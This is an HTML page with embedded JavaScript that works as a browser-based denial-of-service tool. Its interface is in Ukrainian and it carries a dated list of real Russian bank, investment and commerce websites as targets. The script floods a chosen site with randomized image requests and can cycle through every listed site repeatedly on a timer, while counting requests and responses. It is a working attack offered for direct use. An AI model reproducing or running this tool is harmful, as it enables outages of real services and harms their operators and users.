<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>АТАКА САЙТІВ</title>
    <style>
      .body {
        background-color: rgb(248, 128, 128);
        text-align: center;
        padding: 100px;
      }
      @media (max-width: 780px) {
        .body {
          padding: 10px;
        }
      }
      .top {
        display: flex;
        margin: auto;
        justify-content: center;
      }
      @media (max-width: 780px) {
        .top {
          display: block;
          margin: auto;
          justify-content: center;
        }
      }

      .mainForm__button.attackAll.isWorking {
        background-color: grey;
      }
      .mainForm {
        width: 60%;
        background-color: black;
        margin: auto;
        padding: 40px;
      }

      .mainForm__input {
        display: block;
        margin: auto;
        width: 80%;
        padding: 10px;
        text-align: center;
        margin-bottom: 40px;
      }

      .mainForm__label {
        color: white;
        margin-right: auto;
      }

      .mainForm__button {
        padding: 10px 40px;
        background-color: red;
        border-radius: 20px;
        font-size: 20px;
        margin: 10px;
        width: 80%;
      }
      @media (max-width: 780px) {
        .mainForm__button {
          padding: 5px;
          font-size: 15px;
          margin: 5px;
        }
      }

      .log {
        display: block;
        height: 600px;
        color: azure;
        margin-top: 10px;
      }
      @media (max-width: 780px) {
        .log {
          display: block;
        }
        .log__container {
          display: block;
        }
      }

      .log__list,
      .info__list {
        height: 100%;
        background-color: bisque;
        color: black;
        font-family: monospace;
        text-align: initial;
        overflow: hidden;
        margin-bottom: 20px;
        padding: 10px;
      }
      .info__list {
        height: auto;
      }
      .log__container {
        display: inline-block;
        margin-bottom: 5px;
      }
      @media (max-width: 780px) {
        .log__list,
        .info__list {
          padding: 5px;
        }
        .log__container {
          display: block;
        }
      }

      .log__label {
        margin: 10px;
        width: 40%;
      }
      .log__requests-input,
      .log__responses-input {
        width: 100px;
      }
      @media (max-width: 780px) {
        .log__label {
          display: block;
          margin: 10px auto;
          width: 50%;
        }
        .log__requests-input,
        .log__responses-input {
          width: 50%;
        }
      }

      .log__item,
      .info__item {
        list-style: none;
        margin-top: 2px;
        border-bottom: 1px solid black;
      }
    </style>
  </head>
  <body class="body">
    <section class="top">
      <div class="form__contsiner">
        <h1>ПТН ПНХ</h1>
        <form action="submit" class="mainForm">
          <label for="mainForm__input url" class="mainForm__label">Посилання на цільовий сайт</label>
          <input type="text" class="mainForm__input url" placeholder="https://goszakaz.ru/" value="" />
          <label for="mainForm__input counter" class="mainForm__label">Лічильник</label>
          <input type="text" class="mainForm__input counter" placeholder="Количество атак" value="10" />

          <button class="mainForm__button">Атакувати цільовий сайт запитами</button>
          <button class="mainForm__button attackAll">Запустити циклічну атаку по актуальним сайтам</button>
        </form>
      </div>
      <div class="info">
        <h2>Перелік актуальних сайтів станом на 8 березня 2022</h2>
        <ul class="info__list">
          <li class="info__item">https://sberfn.ru/</li>
          <li class="info__item">https://sber-am.ru/</li>
          <li class="info__item">https://www.vtbcapital-pr.ru/</li>
          <li class="info__item">https://region-am.ru/</li>
          <li class="info__item">https://www.ingosinvest.ru/</li>
          <li class="info__item">https://goszakaz.ru/</li>
          <li class="info__item">https://star-pro.ru/</li>
          <li class="info__item">http://ati.su</li>
          <li class="info__item">https://region.ru/</li>
          <li class="info__item">https://monopoly.ru/</li>
          <li class="info__item">https://ul.su/</li>
          <li class="info__item">http://gruzovozkin.pro</li>
        </ul>
      </div>
    </section>
    <section class="log">
      <div class="log__container">
        <label class="log__label" for="log__requests-input">Відправлено запитів</label>
        <input type="number" class="log__requests-input" value="0" />
      </div>
      <div class="log__container">
        <label class="log__label" for="log__responses-input">Отримано відповідей</label>
        <input type="number" class="log__responses-input" value="0" />
      </div>
      <ul class="log__list"></ul>
    </section>
    <script>
      const inputUrl = document.querySelector('.url')
      const inputCounter = document.querySelector('.counter')
      const logList = document.querySelector('.log__list')
      const logItem = document.querySelector('.log__item')
      const mainForm = document.querySelector('.mainForm')
      const totalRequests = document.querySelector('.log__requests-input')
      const totalResponses = document.querySelector('.log__responses-input')
      const tergets = document.querySelectorAll('.info__item')
      const btnAll = document.querySelector('.attackAll')
      let attackInterval
      function getCounter() {
        const counter = inputCounter.value ? parseInt(inputCounter.value) : 0
        if (isNaN(counter)) alert('введите число')
        return counter
      }
      function generateId() {
        return Math.random().toString(36).slice(-5)
      }
      function writeToLog(text) {
        const logElement = document.createElement('li')
        logElement.innerText = text
        logElement.className = 'log__item'
        logList.insertAdjacentElement('afterbegin', logElement)
      }
      function timestamp() {
        const Data = new Date()
        const Year = Data.getFullYear()
        let Month = Data.getMonth() + 1
        if (Month < 10) Month = '0' + Month
        const Day = Data.getDate() < 10 ? '0' + Data.getDate() : Data.getDate()
        const Hour = Data.getHours() < 10 ? '0' + Data.getHours() : Data.getHours()
        const Minutes = Data.getMinutes() < 10 ? '0' + Data.getMinutes() : Data.getMinutes()
        const Seconds = Data.getSeconds() < 10 ? '0' + Data.getSeconds() : Data.getSeconds()
        return Year + '.' + Month + '.' + Day + ' - ' + Hour + ':' + Minutes + ':' + Seconds
      }

      function attack(url) {
        for (let i = 1; i <= getCounter(); i++) {
          const image = new Image()
          image.onerror = function (e) {
            let urlLog = e.path[0].currentSrc.slice(8).split('/')[0]
            if (btnAll.className === 'mainForm__button attackAll isWorking') {
              writeToLog(timestamp() + ' - вдала атака на "' + urlLog + '". Чекайте. ')
            }
            totalResponses.value++
          }
          image.src = url + '/' + generateId() + '?' + generateId() + '=' + Math.floor(Math.random() * 1000)
          totalRequests.value++
        }
        writeToLog(
          timestamp() +
            ' - на "' +
            url +
            '" відправлено ' +
            getCounter() +
            ' запитів. Не закривайте сторінку. Чекайте, хай відповість.',
        )
      }

      function mainFormSubmit(e) {
        e.preventDefault()
        const url = inputUrl.value.toLowerCase()
        if (!url) alert('введите адрес')

        attack(url)
      }

      function groupAttack() {
        tergets.forEach(target => {
          const url = target.innerHTML
          attack(url)
        })
      }

      function attackAll(e) {
        e.preventDefault()
        btnAll.classList.toggle('isWorking')

        if (btnAll.className === 'mainForm__button attackAll isWorking') {
          groupAttack()
          attackInterval = setInterval(groupAttack, getCounter() * 800)
          writeToLog(timestamp() + ' - цикл запущено.')
          btnAll.textContent = 'Зупинити'
        } else {
          clearInterval(attackInterval)
          writeToLog(timestamp() + ' - цикл вимкнено. Відповіді будуть ще повертатись. Дивись лічильник')
          btnAll.textContent = 'Запустити циклічну атаку по актуальним сайтам'
        }
      }

      mainForm.addEventListener('submit', mainFormSubmit)
      btnAll.addEventListener('click', attackAll)
    </script>
  </body>
</html>
